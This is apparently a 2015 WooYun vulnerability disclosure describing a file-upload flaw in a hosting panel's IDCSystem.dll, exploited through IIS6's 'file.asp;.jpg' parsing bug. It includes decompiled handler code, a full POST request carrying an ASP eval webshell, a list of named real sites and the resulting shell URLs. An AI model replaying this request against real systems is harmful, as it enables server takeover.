乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-17: 细节已通知厂商并且等待厂商处理中 2015-06-19: 厂商已经确认,细节仅向厂商公开 2015-06-22: 细节向第三方安全合作伙伴开放 2015-08-13: 细节向核心白帽子及相关领域专家公开 2015-08-23: 细节向普通白帽子公开 2015-09-02: 细节向实习白帽子公开 2015-09-17: 细节向公众公开
上传漏洞,配合iis6解析漏洞可getshell.
上传处理代码:IDCSystem.dll:
private static string smethod_37(){ string uCS = XS.getUCS("uss", 1); string text = HttpContext.Current.Request.Headers["action"]; // http头获取action string text2 = HttpContext.Current.Server.MapPath(XS.getUploadConfig("get_temp_dir", "prefix")); string text3 = text; string result; if (text3 != null) { if (!(text3 == "ftheme") && !(text3 == "btheme") && !(text3 == "js_plugin")) { if (text3 == "attachment") //action为attachment时,进入上传流程 { goto IL_A9; } } else { if (!XS.isAdmin()) { result = "-1|No administrative privileges"; return result; } goto IL_A9; } } Common.responseMsg("It works!"); IL_A9: int num = (HttpContext.Current.Request.Params["chunk"] != null) ? int.Parse(HttpContext.Current.Request.Params["chunk"]) : 0; //text4 为name参数传进,可控。 string text4 = (HttpContext.Current.Request.Params["name"] != null) ? HttpContext.Current.Request.Params["name"].ToLower() : "temp.jpg"; string str = (text4.LastIndexOf(".") < 0) ? "unknow" : text4.Substring(text4.LastIndexOf(".") + 1).ToLower(); string text5 = "," + XS.getUploadConfig(text, "exts") + ","; if (text5.IndexOf("," + str + ",") < 0) { result = "-1|" + xUser.smethod_40(text2, string.Concat(new string[] { "UserID:", uCS, "\r\nUserIP:", HttpContext.Current.Request.UserHostAddress, "\r\nMessage: Invalid file type:", text4 })); } else { FileStream fileStream = new FileStream(text2 + text4, (num == 0) ? FileMode.OpenOrCreate : FileMode.Append); //上传文件保存路径为 text2 + text4,text4可控,于是路径可控 byte[] array = null; if (HttpContext.Current.Request.ContentType == "application/octet-stream" && HttpContext.Current.Request.ContentLength > 0) { array = new byte[HttpContext.Current.Request.InputStream.Length]; HttpContext.Current.Request.InputStream.Read(array, 0, array.Length); } else { if (HttpContext.Current.Request.ContentType.Contains("multipart/form-data") && HttpContext.Current.Request.Files.Count > 0 && HttpContext.Current.Request.Files[0].ContentLength > 0) { array = new byte[HttpContext.Current.Request.Files[0].InputStream.Length]; HttpContext.Current.Request.Files[0].InputStream.Read(array, 0, array.Length); } } if (array != null) { fileStream.Write(array, 0, array.Length); } fileStream.Close(); fileStream.Dispose(); result = "0"; } return result;}
文件后缀有限制,但可利用iis6解析漏洞来getshell.
这年头仍旧使用iis6的站点少了很多:
cp.korea-vps.comwww.90dns.netwww.10028.itwww.aituyun.comwww.ccwiz.comwww.tjwq.wangwww.zhengdavps.comwww.xeonidc.com
以www.10028.it为例:(需要登录)
POST http://www.10028.it/upload.aspx?at=upload HTTP/1.1Host: www.10028.itProxy-Connection: keep-aliveContent-Length: 302Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: nullUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryctAyyCGABVVmjkwnAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8action: attachmentCookie: uname=testxxoo; uss=hCkshKbroAa/8ORwcPi//A==------WebKitFormBoundaryctAyyCGABVVmjkwnContent-Disposition: form-data; name="img"; filename="1.jpg"Content-Type: image/jpeg<%eval(request("aa"))%>------WebKitFormBoundaryctAyyCGABVVmjkwnContent-Disposition: form-data; name="name"1.asp;.jpg------WebKitFormBoundaryctAyyCGABVVmjkwn--
上传后shell地址:http://www.10028.it/files/temp/1.asp;.jpg
http://www.xeonidc.com/files/temp/1.asp;.jpg
随机文件名.
危害等级:中
漏洞Rank:10
确认时间:2015-06-19 12:13
非常感谢您的反馈,我们已经在对IIS6的这个漏洞进行相应的处理方案!
暂无